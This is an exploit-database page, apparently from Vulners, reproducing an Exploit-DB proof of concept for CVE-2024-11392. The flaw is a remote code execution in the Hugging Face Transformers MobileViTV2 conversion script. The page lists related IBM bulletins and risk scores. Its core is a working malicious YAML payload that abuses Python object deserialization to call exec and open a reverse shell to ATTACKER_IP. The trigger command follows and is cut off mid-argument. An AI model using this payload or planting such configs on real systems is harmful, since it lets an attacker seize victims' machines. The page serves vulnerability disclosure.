Hugging Face Transformers MobileViTV2 4.41.1 - Remote Code Execution (RCE)

🗓️ 16 Apr 2025 00:00:00Reported by The Kernel PanicType

exploitdb🔗 www.exploit-db.com👁 222 Views

Hugging Face Transformers MobileViTV2 4.41.1 has a Remote Code Execution vulnerability due to deserialization.

Reporter	Title	Published	Views	Family All 31
IBM Security Bulletins	Security Bulletin: DataStage on Cloud Pak for Data has vulnerabilities due to transformers package (CVE-2024-11392, CVE-2024-11393, CVE-2024-11394)	17 Jul 202518:34	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Maximo Application Suite - Monitor Component is vulnerable to transformers-4.46.3-py3-none-any.whl CVE-2024-12720	13 May 202507:55	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple security vulnerabilities affecting IBM Knowledge Catalog for IBM Cloud Pak for Data	8 May 202523:59	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Watson Speech Services Cartridge v4.8.8 is vulnerable to Remote Code Execution in Transformers [CVE-2024-11392, CVE-2024-11393, CVE-2024-11394]	30 May 202515:04	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Maximo Application Suite Ai-Service Component uses Hugging Face Transformers MobileViTV2 Deserialization of Untrusted Data Remote Code Execution Vulnerability.	9 May 202509:00	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Watson Speech Services Cartridge is vulnerable to arbitrary code execution in Hugging Face Transformers [CVE-2024-11392, CVE-2024-11393, CVE-2024-11394]	2 Apr 202517:21	–	ibm
IBM Security Bulletins	Security Bulletin: There is a vulnerability in Python wheel package for the Hugging Face Transformers library affecting watsonx Code Assistant On Prem Extensions	27 Mar 202515:39	–	ibm
GithubExploit	Exploit for Deserialization of Untrusted Data in Huggingface Transformers	7 Dec 202411:14	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Huggingface Transformers	18 Oct 202516:34	–	githubexploit
Chainguard	CVE-2024-11392 vulnerabilities	22 Nov 202422:15	–	cgr

# Exploit Title: Hugging Face Transformers MobileViTV2 RCE
# Date: 29-11-2024
# Exploit Author: The Kernel Panic
# Vendor Homepage: https://huggingface.co/
# Software Link: https://github.com/huggingface/transformers/releases
# Version: 4.41.1
# Tested on: Linux, Windows, Mac
# CVE : CVE-2024-11392


# Code flow from input to the vulnerable condition:
# 1. The user downloads a third-party ml-cvnet model alongside its configuration file.
# 2. The user runs the convert_mlcvnets_to_pytorch.py script and passes the configuration file to it.
# 3. The convert_mlcvnets_to_pytorch.py script de-serializes the configuration file and executes the malicious code.


# POC

# Create a malicious yaml configuration file called "transformers_exploit.yaml" like shown below.
# Note: Remember to change the 'ATTACKER_IP' and 'ATTACKER_PORT'.

!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('socket').socket(socket.AF_INET, socket.SOCK_STREAM).connect(('ATTACKER_IP', ATTACKER_PORT));import os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',ATTACKER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash')"


# Run the convert_mlcvnets_to_pytorch.py script and pass the transformers_exploit.yaml file to --orig_config_path 

> python convert_mlcvnets_to_pytorch.py --orig_checkpoint_path dummy_checkpoint.pt --or

# Note: The dummy_checkpoint.pt can be left as an empty file, dummy_output as an empty directory , and "task" as any of the options metioned in the script.

16 Apr 2025 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 3.18.8

CVSS 37.5

EPSS0.5929

SSVC